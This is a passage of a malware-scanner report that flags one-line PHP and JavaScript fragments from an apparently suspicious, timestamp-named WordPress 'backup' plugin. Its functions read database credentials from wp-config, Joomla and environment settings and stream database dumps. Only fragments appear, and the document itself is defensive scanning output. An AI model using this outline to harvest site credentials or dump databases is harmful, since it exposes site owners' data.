<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_db_info_rows</span><span style="color: #007700">(</span><span style="color: #0000BB">$site</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 40</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'up_to_wp_register_admin_page'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_wp_get_app_url</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 42</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">wp_nonce_url</span><span style="color: #007700">(</span><span style="color: #0000BB">admin_url</span><span style="color: #007700">(</span><span style="color: #DD0000">'admin-post.php?action=up_to_scanner_app'</span><span style="color: #007700">), </span><span style="color: #DD0000">'up_to_scanner_app'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 439</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$rows</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 443</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">apr1_md5</span><span style="color: #007700">(</span><span style="color: #0000BB">$password</span><span style="color: #007700">, </span><span style="color: #0000BB">$salt </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 45</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_wp_register_admin_page</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 465</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'$apr1$' </span><span style="color: #007700">. </span><span style="color: #0000BB">$salt </span><span style="color: #007700">. </span><span style="color: #DD0000">'$' </span><span style="color: #007700">. </span><span style="color: #0000BB">$tmp</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 467</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">apr1_to64</span><span style="color: #007700">(</span><span style="color: #0000BB">$v</span><span style="color: #007700">, </span><span style="color: #0000BB">$n</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 471</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_wp_render_admin_page</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 530</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$a</span><span style="color: #007700">, </span><span style="color: #0000BB">$b</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 531</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$a</span><span style="color: #007700">[</span><span style="color: #DD0000">'is_dir'</span><span style="color: #007700">] ? -</span><span style="color: #0000BB">1 </span><span style="color: #007700">: </span><span style="color: #0000BB">1</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 532</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return -</span><span style="color: #0000BB">1</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 533</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">1</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 534</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">strcasecmp</span><span style="color: #007700">(</span><span style="color: #0000BB">$a</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">], </span><span style="color: #0000BB">$b</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 61</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_wp_handle_app_request</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 783</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">db_esc_ident</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 784</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'`' </span><span style="color: #007700">. </span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'`'</span><span style="color: #007700">, </span><span style="color: #DD0000">'``'</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">) . </span><span style="color: #DD0000">'`'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 786</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">db_sanitize_file_part</span><span style="color: #007700">(</span><span style="color: #0000BB">$value</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 790</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$value </span><span style="color: #007700">!== </span><span style="color: #DD0000">'' </span><span style="color: #007700">? </span><span style="color: #0000BB">$value </span><span style="color: #007700">: </span><span style="color: #DD0000">'site'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 792</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">db_credentials_empty</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 802</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parse_db_host_port</span><span style="color: #007700">(</span><span style="color: #0000BB">$host</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 805</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">'127.0.0.1'</span><span style="color: #007700">, </span><span style="color: #0000BB">null</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 807</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #0000BB">$m</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">], </span><span style="color: #0000BB">$m</span><span style="color: #007700">[</span><span style="color: #0000BB">2</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 809</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #0000BB">$host</span><span style="color: #007700">, </span><span style="color: #0000BB">null</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 811</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">merge_db_credentials</span><span style="color: #007700">(</span><span style="color: #0000BB">$base</span><span style="color: #007700">, </span><span style="color: #0000BB">$overlay</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 817</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$base</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 819</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">db_credentials_is_complete</span><span style="color: #007700">(</span><span style="color: #0000BB">$creds</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 820</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$creds</span><span style="color: #007700">[</span><span style="color: #DD0000">'db_name'</span><span style="color: #007700">]) !== </span><span style="color: #DD0000">'' </span><span style="color: #007700">&& </span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$creds</span><span style="color: #007700">[</span><span style="color: #DD0000">'db_user'</span><span style="color: #007700">]) !== </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 822</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">db_credentials_from_wp</span><span style="color: #007700">(</span><span style="color: #0000BB">$wp</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 833</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$c</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 835</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">db_credentials_from_env</span><span style="color: #007700">(</span><span style="color: #0000BB">$env</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 861</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">db_credentials_from_joomla</span><span style="color: #007700">(</span><span style="color: #0000BB">$joo</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 873</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_db_credentials_from_parts</span><span style="color: #007700">(</span><span style="color: #0000BB">$env_vars</span><span style="color: #007700">, </span><span style="color: #0000BB">$wp_vars</span><span style="color: #007700">, </span><span style="color: #0000BB">$joo_vars</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 878</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">db_credentials_is_complete</span><span style="color: #007700">(</span><span style="color: #0000BB">$creds</span><span style="color: #007700">) ? </span><span style="color: #0000BB">$creds </span><span style="color: #007700">: </span><span style="color: #0000BB">null</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 880</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parse_db_config_snippet</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 882</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">db_credentials_empty</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 923</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$found</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 925</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dump_input_from_post</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 939</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dump_database_stream</span><span style="color: #007700">(</span><span style="color: #0000BB">$in</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 943</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'deflate_init'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 97</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_run_app</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 998</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function (</span><span style="color: #0000BB">$line</span><span style="color: #007700">) use (</span><span style="color: #0000BB">$out</span><span style="color: #007700">, </span><span style="color: #0000BB">$zip</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'up_to_wp_mode'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_526").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/backup_1781207797/page-template-1781207797.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 155.37 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-06-11 22:56:39</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-06-11 22:56:39</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 271</span><br><table id="file_527" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">) { </span><span style="color: #0000BB">btn</span><span style="color: #007700">.</span><span style="color: #0000BB">disabled</span><span style="color: #007700">=</span><span style="color: #0000BB">false</span><span style="color: #007700">; </span><span style="color: #0000BB">btn</span><span style="color: #007700">.</span><span style="color: #0000BB">textContent</span><span style="color: #007700">=</span><span style="color: #DD0000">'💾 Сохранить'</span><span style="color: #007700">; </span><span style="color: #0000BB">msg</span><span style="color: #007700">.</span><span style="color: #0000BB">className</span><span style="color: #007700">=</span><span style="color: #DD0000">'modal-msg error'</span><span style="color: #007700">; </span><span style="color: #0000BB">msg</span><span style="color: #007700">.</span><span style="color: #0000BB">textContent</span><span style="color: #007700">=</span><span style="color: #DD0000">'❌ '</span><span style="color: #007700">+</span><span style="color: #0000BB">e</span><span style="color: #007700">.</span><span style="color: #0000BB">message</span><span style="color: #007700">; }); } </span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #DD0000">'modal-overlay'</span><span style="color: #007700">).</span><span style="color: #0000BB">addEventListener</span><span style="color: #007700">(</span><span style="color: #DD0000">'click'</span><span style="color: #007700">,function(</span><span style="color: #0000BB">e</span><span style="color: #007700">){ if(</span><span style="color: #0000BB">e</span><span style="color: #007700">.</span><span style="color: #0000BB">target</span><span style="color: #007700">===</span><span style="color: #0000BB">this</span><span style="color: #007700">) </span><span style="color: #0000BB">closeModal</span><span style="color: #007700">(); });</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1002</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dump_database_stream</span><span style="color: #007700">(</span><span style="color: #0000BB">$in</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1006</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'deflate_init'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1061</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function (</span><span style="color: #0000BB">$line</span><span style="color: #007700">) use (</span><span style="color: #0000BB">$out</span><span style="color: #007700">, </span><span style="color: #0000BB">$zip</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'up_to_wp_mode'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1214</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dir_is_readable</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1216</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return @</span><span style="color: #0000BB">scandir</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) !== </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
